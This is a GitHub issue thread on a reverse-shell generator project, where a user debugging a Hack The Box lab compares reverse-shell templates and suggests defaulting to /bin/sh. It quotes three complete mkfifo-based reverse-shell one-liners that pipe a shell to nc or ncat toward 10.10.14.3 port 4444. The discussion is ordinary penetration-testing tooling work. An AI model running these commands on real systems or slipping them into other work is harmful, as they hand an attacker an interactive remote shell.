### ISSUE TITLE
ncat udp/mkfifo could use alternate forms?

### ISSUE THREAD

**Issue by edwardsd97** [0dayCTF/reverse-shell-generator#149]
Was watching IppSec's video walkthrough of Nibbles from app.hackthebox.com and noticed that the ncat udp reverse shell used in this repo didn't work, while the one from pentestmonkey.org did.

This works
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f

While these two did not

**ncat mkfifo**
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 4444 >/tmp/f

**ncat udp**
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.14.3 4444 >/tmp/f

Basically seems to be the diff between sh and /bin/sh

Maybe the generator could use some more flavor options?

**Comment by edwardsd97** [comment]
Oh... never mind... Somehow I completely missed the shell type dropdown.. maybe it should default to /bin/sh instead of sh then? :)
